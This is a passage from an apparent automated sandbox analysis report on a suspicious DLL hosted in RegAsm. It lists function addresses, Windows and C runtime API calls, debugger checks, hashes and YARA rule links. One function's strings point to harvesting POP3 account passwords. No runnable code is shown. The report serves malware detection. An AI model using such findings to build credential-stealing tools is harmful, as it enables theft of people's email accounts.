                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                                                                • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                                                                Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                                                • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                                                Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .
                                                                                                                                                                                • API String ID: 0-248832578
                                                                                                                                                                                • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                                • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                                                                • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                                • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                                                                                Function 1000724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                                                                                                • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                                                                                                                                                                • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                                                                                                                                                • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00
                                                                                                                                                                                Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                • API String ID: 4218353326-3023110444
                                                                                                                                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                                Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                • API String ID: 4218353326-230879103
                                                                                                                                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                                Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                                • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                                • _free.LIBCMT ref: 10007D32
                                                                                                                                                                                • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                                • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                                • _free.LIBCMT ref: 10007D72
                                                                                                                                                                                • _free.LIBCMT ref: 10007D80
                                                                                                                                                                                • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                                • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                                • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                                • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                                • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                                • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                                Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 100059EA
                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                • _free.LIBCMT ref: 100059F6
                                                                                                                                                                                • _free.LIBCMT ref: 10005A01
                                                                                                                                                                                • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                                • _free.LIBCMT ref: 10005A17
                                                                                                                                                                                • _free.LIBCMT ref: 10005A22
                                                                                                                                                                                • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                                • _free.LIBCMT ref: 10005A38
                                                                                                                                                                                • _free.LIBCMT ref: 10005A43
                                                                                                                                                                                • _free.LIBCMT ref: 10005A51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                                • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                                Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                                                • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                                • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                                • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                                Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                                • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                                Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                                • _free.LIBCMT ref: 100092AB
                                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                • _free.LIBCMT ref: 100092B6
                                                                                                                                                                                • _free.LIBCMT ref: 100092C1
                                                                                                                                                                                • _free.LIBCMT ref: 10009315
                                                                                                                                                                                • _free.LIBCMT ref: 10009320
                                                                                                                                                                                • _free.LIBCMT ref: 1000932B
                                                                                                                                                                                • _free.LIBCMT ref: 10009336
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                                                Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                                • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                                • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1922816806-0
                                                                                                                                                                                • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                                                • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                                                Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3594823470-0
                                                                                                                                                                                • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                                                • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                                                Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                                                • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                                                Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                • _free.LIBCMT ref: 10005B55
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                                • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                                                • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                                                Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
